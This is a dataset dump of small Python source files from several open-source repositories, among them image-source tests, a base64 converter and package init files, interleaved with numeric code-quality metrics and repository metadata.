| 7.5
| 19
| 0.7
| 3
| 30
| 7
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.266667
| 30
| 3
| 20
| 10
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
5f4a2237aaaf37b46e9c5b75fea41477b9337990
| 16
|
py
|
Python
|
test.py
|
MesaPrime/PyLauncher
|
2bccd8644fedd7af3bdc86aac06e81c92c1c4403
|
[
"MIT"
] | null | null | null |
test.py
|
MesaPrime/PyLauncher
|
2bccd8644fedd7af3bdc86aac06e81c92c1c4403
|
[
"MIT"
] | null | null | null |
test.py
|
MesaPrime/PyLauncher
|
2bccd8644fedd7af3bdc86aac06e81c92c1c4403
|
[
"MIT"
] | null | null | null |
print('yesyes')
| 8
| 15
| 0.6875
| 2
| 16
| 5.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0625
| 16
| 1
| 16
| 16
| 0.733333
| 0
| 0
| 0
| 0
| 0
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
5f792f4d53479b564b3d7c51fbf92e73720fdb96
| 69
|
py
|
Python
|
ankh_slam/graph.py
|
HemaZ/ankh_slam
|
05b3486e381227f9a032653973df119d14cc0897
|
[
"MIT"
] | null | null | null |
ankh_slam/graph.py
|
HemaZ/ankh_slam
|
05b3486e381227f9a032653973df119d14cc0897
|
[
"MIT"
] | null | null | null |
ankh_slam/graph.py
|
HemaZ/ankh_slam
|
05b3486e381227f9a032653973df119d14cc0897
|
[
"MIT"
] | null | null | null |
class Graph(object):
def __init__(self, n):
self._n = n
| 13.8
| 26
| 0.565217
| 10
| 69
| 3.4
| 0.7
| 0.294118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.304348
| 69
| 4
| 27
| 17.25
| 0.708333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 5
|
5f81d2422c20117d43b8c9e452de869f07a8ac58
| 174
|
py
|
Python
|
Solutions/5kyu/5kyu_base64_numeric_translator.py
|
citrok25/Codewars-1
|
dc641c5079e2e8b5955eb027fd15427e5bdb2e26
|
[
"MIT"
] | 46
|
2017-08-24T09:27:57.000Z
|
2022-02-25T02:24:33.000Z
|
Solutions/5kyu/5kyu_base64_numeric_translator.py
|
abbhishek971/Codewars
|
9e761811db724da1e8aae44594df42b4ee879a16
|
[
"MIT"
] | null | null | null |
Solutions/5kyu/5kyu_base64_numeric_translator.py
|
abbhishek971/Codewars
|
9e761811db724da1e8aae44594df42b4ee879a16
|
[
"MIT"
] | 35
|
2017-08-01T22:09:48.000Z
|
2022-02-18T17:21:37.000Z
|
ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
def base64_to_base10(s):
return sum(ALPHABET.index(j)*64**i for i,j in enumerate(s[::-1]))
| 34.8
| 77
| 0.770115
| 21
| 174
| 6.285714
| 0.809524
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107595
| 0.091954
| 174
| 4
| 78
| 43.5
| 0.727848
| 0
| 0
| 0
| 0
| 0
| 0.367816
| 0.367816
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.333333
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
39733d1f252472c80454bdeada0d06a15d16a1ca
| 174
|
py
|
Python
|
colorline/test/test1.py
|
houluy/colorline
|
27127ab8e1558b7fe9ac39a52feb95468e3d5ac6
|
[
"MIT"
] | 1
|
2018-02-19T18:06:50.000Z
|
2018-02-19T18:06:50.000Z
|
colorline/test/test1.py
|
houluy/colorline
|
27127ab8e1558b7fe9ac39a52feb95468e3d5ac6
|
[
"MIT"
] | null | null | null |
colorline/test/test1.py
|
houluy/colorline
|
27127ab8e1558b7fe9ac39a52feb95468e3d5ac6
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from colorline import cprint
class TestEnd(TestCase):
def test_end(self):
cprint('test newline', end='')
print('newline')
| 19.333333
| 38
| 0.678161
| 21
| 174
| 5.571429
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.218391
| 174
| 8
| 39
| 21.75
| 0.860294
| 0
| 0
| 0
| 0
| 0
| 0.109195
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.333333
| 0
| 0.666667
| 0.5
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 5
|
f2cc6d4ef34a94a338677cdf7b8b3939a63c5462
| 221
|
py
|
Python
|
taxonomy_matcher/match_patterns/__init__.py
|
tilaboy/taxonomy-matcher
|
ac74e2cffc3b999bf800511987dcf0ddae1513bc
|
[
"MIT"
] | 1
|
2021-10-09T12:23:27.000Z
|
2021-10-09T12:23:27.000Z
|
taxonomy_matcher/match_patterns/__init__.py
|
tilaboy/gazetteer-matcher
|
ac74e2cffc3b999bf800511987dcf0ddae1513bc
|
[
"MIT"
] | 197
|
2019-08-12T03:18:02.000Z
|
2022-03-28T09:37:20.000Z
|
taxonomy_matcher/match_patterns/__init__.py
|
tilaboy/taxonomy-matcher
|
ac74e2cffc3b999bf800511987dcf0ddae1513bc
|
[
"MIT"
] | null | null | null |
# import all pattern classes here
from .patterns_gz import PatternsGZ
from .patterns_ct import PatternsCT
from .patterns_nt import PatternsNT
__all__ = ['PatternsGZ', 'PatternsCT', 'PatternsNT']
name = 'match_patterns'
| 24.555556
| 52
| 0.791855
| 27
| 221
| 6.185185
| 0.555556
| 0.215569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126697
| 221
| 8
| 53
| 27.625
| 0.865285
| 0.140271
| 0
| 0
| 0
| 0
| 0.234043
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
f2fc06c5b953fb9f371cd602dd60bb3dae46af55
| 96
|
py
|
Python
|
enthought/envisage/ui/action/location.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | 3
|
2016-12-09T06:05:18.000Z
|
2018-03-01T13:00:29.000Z
|
enthought/envisage/ui/action/location.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | 1
|
2020-12-02T00:51:32.000Z
|
2020-12-02T08:48:55.000Z
|
enthought/envisage/ui/action/location.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | null | null | null |
# proxy module
from __future__ import absolute_import
from envisage.ui.action.location import *
| 24
| 41
| 0.833333
| 13
| 96
| 5.769231
| 0.769231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114583
| 96
| 3
| 42
| 32
| 0.882353
| 0.125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
8401e27cfb37d5389aae9d223e43d5dc62988ebc
| 38
|
py
|
Python
|
__main__.py
|
csudre/NMJ_Analyser
|
75cb8a0e130d84946871cb1a6c7cca42b80cc6ae
|
[
"Apache-2.0"
] | null | null | null |
__main__.py
|
csudre/NMJ_Analyser
|
75cb8a0e130d84946871cb1a6c7cca42b80cc6ae
|
[
"Apache-2.0"
] | 1
|
2022-03-13T21:57:11.000Z
|
2022-03-13T21:57:11.000Z
|
__main__.py
|
csudre/NMJ_Analyser
|
75cb8a0e130d84946871cb1a6c7cca42b80cc6ae
|
[
"Apache-2.0"
] | null | null | null |
from .nmj_analyzer import main
main()
| 12.666667
| 30
| 0.789474
| 6
| 38
| 4.833333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131579
| 38
| 2
| 31
| 19
| 0.878788
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
84184cdad55785e0e6fdc4e2f5dcda318619b853
| 115
|
py
|
Python
|
noxrating/__main__.py
|
JPAntonisse/nox-spellenzolder-rating
|
74a11c5fe93766140f0aaa5bc5a99d7ee5afc24d
|
[
"MIT"
] | 2
|
2021-01-05T16:21:58.000Z
|
2021-01-05T19:14:24.000Z
|
noxrating/__main__.py
|
JPAntonisse/nox-spellenzolder-rating
|
74a11c5fe93766140f0aaa5bc5a99d7ee5afc24d
|
[
"MIT"
] | null | null | null |
noxrating/__main__.py
|
JPAntonisse/nox-spellenzolder-rating
|
74a11c5fe93766140f0aaa5bc5a99d7ee5afc24d
|
[
"MIT"
] | null | null | null |
"""
NoxRating Main Logic
"""
if __name__ == "__main__":
from noxrating import noxrating
noxrating.main()
| 12.777778
| 35
| 0.669565
| 12
| 115
| 5.75
| 0.583333
| 0.376812
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.208696
| 115
| 9
| 36
| 12.777778
| 0.758242
| 0.173913
| 0
| 0
| 0
| 0
| 0.090909
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
ffdd7ca21c7fe9a68c3e2ba6c1103c7f3aa4ee42
| 24
|
py
|
Python
|
wind/__init__.py
|
touqir14/Wind
|
01eea6b1d40058a3c33ed4c156a62050e8771f71
|
[
"MIT"
] | null | null | null |
wind/__init__.py
|
touqir14/Wind
|
01eea6b1d40058a3c33ed4c156a62050e8771f71
|
[
"MIT"
] | null | null | null |
wind/__init__.py
|
touqir14/Wind
|
01eea6b1d40058a3c33ed4c156a62050e8771f71
|
[
"MIT"
] | null | null | null |
from .wind import Server
| 24
| 24
| 0.833333
| 4
| 24
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 24
| 1
| 24
| 24
| 0.952381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
fffb508390e5d3e5ebe9fcbb206e8e8e7b57d61c
| 185
|
py
|
Python
|
drivers/import_file.py
|
ndkjing/usv
|
132e021432a0344a22914aaf68da7d7955d7331f
|
[
"MIT"
] | null | null | null |
drivers/import_file.py
|
ndkjing/usv
|
132e021432a0344a22914aaf68da7d7955d7331f
|
[
"MIT"
] | null | null | null |
drivers/import_file.py
|
ndkjing/usv
|
132e021432a0344a22914aaf68da7d7955d7331f
|
[
"MIT"
] | 1
|
2021-09-04T10:27:30.000Z
|
2021-09-04T10:27:30.000Z
|
import os
import sys
root_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(root_dir)
from utils import log
from drivers import pi_softuart
import config
| 26.428571
| 70
| 0.816216
| 32
| 185
| 4.5
| 0.53125
| 0.125
| 0.180556
| 0.208333
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091892
| 185
| 7
| 71
| 26.428571
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.714286
| 0
| 0.714286
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
082c3fa34f3a9060b442e3434aa35bc00d0538c1
| 101
|
py
|
Python
|
accounts/permissions/__init__.py
|
Selfnet/sipam
|
32d7fde288cf7200cde170eadbd6b3541fa730fe
|
[
"Apache-2.0"
] | 2
|
2020-04-19T20:00:32.000Z
|
2022-01-01T21:00:06.000Z
|
accounts/permissions/__init__.py
|
Selfnet/sipam
|
32d7fde288cf7200cde170eadbd6b3541fa730fe
|
[
"Apache-2.0"
] | 7
|
2020-06-05T22:41:24.000Z
|
2022-02-28T01:42:45.000Z
|
accounts/permissions/__init__.py
|
Selfnet/sipam
|
32d7fde288cf7200cde170eadbd6b3541fa730fe
|
[
"Apache-2.0"
] | null | null | null |
from .readonly import AuthenticatedReadOnly, ReadOnlyToken
from .write import UserAccess, WriteToken
| 33.666667
| 58
| 0.861386
| 10
| 101
| 8.7
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09901
| 101
| 2
| 59
| 50.5
| 0.956044
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
0851a082185e30210a76b9484aa3e4147e0b34e3
| 100
|
py
|
Python
|
example_python_codes/class_test.py
|
sergeybok/exploring-minecraft
|
f6c02767beea4215d607f7215e109d6adcef363a
|
[
"Apache-2.0"
] | 1
|
2019-04-06T12:50:28.000Z
|
2019-04-06T12:50:28.000Z
|
example_python_codes/class_test.py
|
sergeybok/exploring-minecraft
|
f6c02767beea4215d607f7215e109d6adcef363a
|
[
"Apache-2.0"
] | null | null | null |
example_python_codes/class_test.py
|
sergeybok/exploring-minecraft
|
f6c02767beea4215d607f7215e109d6adcef363a
|
[
"Apache-2.0"
] | null | null | null |
#import env_class
from env_class_package import env_class
env1 = env_class.env()
env1.print_info()
| 16.666667
| 39
| 0.81
| 17
| 100
| 4.411765
| 0.470588
| 0.426667
| 0.373333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022472
| 0.11
| 100
| 5
| 40
| 20
| 0.820225
| 0.16
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
f23b660b12c7fcbfcd9dd6b6a059c4f42d9b5d3d
| 35
|
py
|
Python
|
ted_sws/notice_packager/adapters/__init__.py
|
meaningfy-ws/ted-xml-2-rdf
|
ac26a19f3761b7cf79d79a46be6323b658f067eb
|
[
"Apache-2.0"
] | 1
|
2022-03-21T12:32:52.000Z
|
2022-03-21T12:32:52.000Z
|
ted_sws/notice_packager/adapters/__init__.py
|
meaningfy-ws/ted-xml-2-rdf
|
ac26a19f3761b7cf79d79a46be6323b658f067eb
|
[
"Apache-2.0"
] | 24
|
2022-02-10T10:43:56.000Z
|
2022-03-29T12:36:21.000Z
|
ted_sws/notice_packager/adapters/__init__.py
|
meaningfy-ws/ted-sws
|
d1e351eacb2900f84ec7edc457e49d8202fbaff5
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python3
# __init__.py
| 7
| 18
| 0.657143
| 5
| 35
| 3.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033333
| 0.142857
| 35
| 4
| 19
| 8.75
| 0.6
| 0.828571
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
f2615ee66090c4cb3c41d00cfd9541cbdf5ac5bc
| 5,669
|
py
|
Python
|
tests/test.py
|
ricshaw/imagesource
|
74042fa9d8755d53c15412785b828372a09c0082
|
[
"MIT"
] | 1
|
2018-12-10T10:16:36.000Z
|
2018-12-10T10:16:36.000Z
|
tests/test.py
|
ricshaw/imagesource
|
74042fa9d8755d53c15412785b828372a09c0082
|
[
"MIT"
] | null | null | null |
tests/test.py
|
ricshaw/imagesource
|
74042fa9d8755d53c15412785b828372a09c0082
|
[
"MIT"
] | 1
|
2021-08-23T15:51:03.000Z
|
2021-08-23T15:51:03.000Z
|
# -*- coding: utf-8 -*-
import imagesource
import hashlib
import cv2
import tempfile
import os.path
import shutil
from nose.tools import eq_
files_template = 'tests/data/frames/%03d.jpg'
video = 'tests/data/MOV02522.MPG'
def test_files():
hashes_rgb = {}
hashes_bgr = {}
for i in range(10):
filename = files_template % i
img = cv2.imread(filename)
assert img is not None, 'Can''t load ' + filename
hashes_bgr[i] = hashlib.md5(img).hexdigest()
hashes_rgb[i] = hashlib.md5(cv2.cvtColor(img, cv2.COLOR_BGR2RGB)).hexdigest()
images = imagesource.FilesSource(files_template)
img = images.get_image(2)
eq_(hashlib.md5(img).hexdigest(), hashes_rgb[2])
img = images.get_next_image()
eq_(hashlib.md5(img).hexdigest(), hashes_rgb[3])
images.rewind()
img = images.get_next_image()
eq_(hashlib.md5(img).hexdigest(), hashes_rgb[0])
images.color_conversion_from_bgr = None
img = images.get_image(2)
eq_(hashlib.md5(img).hexdigest(), hashes_bgr[2])
img = images.get_next_image()
eq_(hashlib.md5(img).hexdigest(), hashes_bgr[3])
images.rewind()
img = images.get_next_image()
eq_(hashlib.md5(img).hexdigest(), hashes_bgr[0])
# tmp_dir = tempfile.TemporaryDirectory() # from Python 3.2
# tmp_dir.name
tmp_dir = tempfile.mkdtemp()
tmp_file_template = os.path.join(tmp_dir, '%03d.png')
images.write_images(tmp_file_template, 10)
for i in range(10):
filename = tmp_file_template % i
img = cv2.imread(filename)
eq_(hashlib.md5(img).hexdigest(), hashes_bgr[i])
shutil.rmtree(tmp_dir) # not needed with tempfile.TemporaryDirectory()
def test_video():
hashes_rgb = {}
hashes_bgr = {}
cap = cv2.VideoCapture(video)
for i in range(10):
retval, img = cap.read()
assert retval
hashes_bgr[i] = hashlib.md5(img).hexdigest()
hashes_rgb[i] = hashlib.md5(cv2.cvtColor(img, cv2.COLOR_BGR2RGB)).hexdigest()
images = imagesource.VideoSource(video)
img = images.get_image(2)
eq_(hashlib.md5(img).hexdigest(), hashes_rgb[2])
img = images.get_next_image()
eq_(hashlib.md5(img).hexdigest(), hashes_rgb[3])
images.rewind()
img = images.get_next_image()
eq_(hashlib.md5(img).hexdigest(), hashes_rgb[0])
images.accurate_slow_seek = True
img = images.get_image(8)
eq_(hashlib.md5(img).hexdigest(), hashes_rgb[8])
img = images.get_image(7)
eq_(hashlib.md5(img).hexdigest(), hashes_rgb[7])
images.accurate_slow_seek = False
img = images.get_image(8)
# eq_(hashlib.md5(img).hexdigest(), hashes_rgb[8]) # the images may differ
img = images.get_image(7)
# eq_(hashlib.md5(img).hexdigest(), hashes_rgb[7]) # the images may differ
images.accurate_slow_seek = True
images.color_conversion_from_bgr = None
img = images.get_image(2)
eq_(hashlib.md5(img).hexdigest(), hashes_bgr[2])
img = images.get_next_image()
eq_(hashlib.md5(img).hexdigest(), hashes_bgr[3])
images.rewind()
img = images.get_next_image()
eq_(hashlib.md5(img).hexdigest(), hashes_bgr[0])
# tmp_dir = tempfile.TemporaryDirectory() # from Python 3.2
# tmp_dir.name
tmp_dir = tempfile.mkdtemp()
tmp_file_template = os.path.join(tmp_dir, '%03d.png')
images.write_images(tmp_file_template, 10)
for i in range(10):
filename = tmp_file_template % i
img = cv2.imread(filename)
eq_(hashlib.md5(img).hexdigest(), hashes_bgr[i])
shutil.rmtree(tmp_dir) # not needed with tempfile.TemporaryDirectory()
def test_timedvideo():
images = imagesource.TimedVideoSource(video)
images.extract_timestamps()
assert images.timestamps_ms is not None
# def test_mass_timedvideo():
# import fnmatch
# import os
#
# matches = []
# for root, dirnames, filenames in os.walk('...somepath...'):
# for filename in fnmatch.filter(filenames, '*.avi'):
# matches.append(os.path.join(root, filename))
# for filename in fnmatch.filter(filenames, '*.AVI'):
# matches.append(os.path.join(root, filename))
# for filename in fnmatch.filter(filenames, '*.mp4'):
# matches.append(os.path.join(root, filename))
# for filename in fnmatch.filter(filenames, '*.MP4'):
# matches.append(os.path.join(root, filename))
#
# for video_file in matches:
# print video_file
# images = imagesource.TimedVideoSource(video_file)
# images.extract_timestamps()
# assert images.timestamps_ms is not None
# print images.timestamps_ms[:30]
def test_synchronized():
hashes_rgb = {}
for i in range(10):
filename = files_template % i
img = cv2.imread(filename)
assert img is not None, 'Can''t load ' + filename
hashes_rgb[i] = hashlib.md5(cv2.cvtColor(img, cv2.COLOR_BGR2RGB)).hexdigest()
images = imagesource.FilesSource(files_template)
frame_lookup_table = [0, 2, 4, 6, 8]
errors = [10, 20, 30, 40, 50]
images_synchronized = imagesource.SynchronizedSource(images, frame_lookup_table, errors)
img = images_synchronized.get_image(0)
eq_(hashlib.md5(img).hexdigest(), hashes_rgb[0])
eq_(images_synchronized.get_synchronization_error(0), 10)
img = images_synchronized.get_image(1)
eq_(hashlib.md5(img).hexdigest(), hashes_rgb[2])
eq_(images_synchronized.get_synchronization_error(1), 20)
img = images_synchronized.get_image(4)
eq_(hashlib.md5(img).hexdigest(), hashes_rgb[8])
eq_(images_synchronized.get_synchronization_error(4), 50)
| 34.357576
| 92
| 0.665197
| 759
| 5,669
| 4.760211
| 0.158103
| 0.071962
| 0.082757
| 0.14005
| 0.795738
| 0.755328
| 0.719624
| 0.719624
| 0.691392
| 0.691392
| 0
| 0.028515
| 0.201976
| 5,669
| 164
| 93
| 34.567073
| 0.770115
| 0.219968
| 0
| 0.712963
| 0
| 0
| 0.019402
| 0.011185
| 0
| 0
| 0
| 0
| 0.037037
| 1
| 0.037037
| false
| 0
| 0.064815
| 0
| 0.101852
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
4b3e2bcdadf005030db9e03c18bd98719a12d2f9
| 564
|
py
|
Python
|
survol/scripts/pydbg/utils/__init__.py
|
AugustinMascarelli/survol
|
7a822900e82d1e6f016dba014af5741558b78f15
|
[
"BSD-3-Clause"
] | 9
|
2017-10-05T23:36:23.000Z
|
2021-08-09T15:40:03.000Z
|
survol/scripts/pydbg/utils/__init__.py
|
AugustinMascarelli/survol
|
7a822900e82d1e6f016dba014af5741558b78f15
|
[
"BSD-3-Clause"
] | 21
|
2018-01-02T09:33:03.000Z
|
2018-08-27T11:09:52.000Z
|
survol/scripts/pydbg/utils/__init__.py
|
AugustinMascarelli/survol
|
7a822900e82d1e6f016dba014af5741558b78f15
|
[
"BSD-3-Clause"
] | 4
|
2018-06-23T09:05:45.000Z
|
2021-01-22T15:36:50.000Z
|
#
# $Id: __init__.py 211 2007-08-16 20:18:47Z pedram $
#
__all__ = \
[
"code_coverage",
"crash_binning",
"hooking",
"injection",
"udraw_connector",
]
import sys
if sys.version_info >= (3,):
from .code_coverage import *
from .crash_binning import *
from .hooking import *
from .injection import *
from .udraw_connector import *
else:
from code_coverage import *
from crash_binning import *
from hooking import *
from injection import *
from udraw_connector import *
| 20.142857
| 52
| 0.611702
| 64
| 564
| 5.109375
| 0.4375
| 0.244648
| 0.183486
| 0.134557
| 0.636086
| 0.636086
| 0.636086
| 0.636086
| 0.636086
| 0.636086
| 0
| 0.045226
| 0.294326
| 564
| 27
| 53
| 20.888889
| 0.776382
| 0.088652
| 0
| 0
| 0
| 0
| 0.111765
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.52381
| 0
| 0.52381
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
4b8dccae20d3918c17b046b641d2a30cc83709ab
| 111
|
py
|
Python
|
skiski/helper.py
|
esehara/skiski
|
9c76ebb9a0cda97382b85180157b0bd5e2f62f71
|
[
"MIT"
] | null | null | null |
skiski/helper.py
|
esehara/skiski
|
9c76ebb9a0cda97382b85180157b0bd5e2f62f71
|
[
"MIT"
] | 1
|
2016-05-20T04:30:25.000Z
|
2016-05-20T20:41:28.000Z
|
skiski/helper.py
|
esehara/skiski
|
9c76ebb9a0cda97382b85180157b0bd5e2f62f71
|
[
"MIT"
] | null | null | null |
def Typename(name):
class TypeN(type):
def __repr__(cls):
return name
return TypeN
| 18.5
| 26
| 0.576577
| 13
| 111
| 4.615385
| 0.692308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.342342
| 111
| 5
| 27
| 22.2
| 0.821918
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
4bab11cb7e924a79094e539914486418616b1947
| 128
|
py
|
Python
|
pipenv/patched/piptools/click.py
|
Enzime/pipenv
|
d4f710be4a39e09a82a5133b7b3a277ee9bfb13a
|
[
"MIT"
] | 4
|
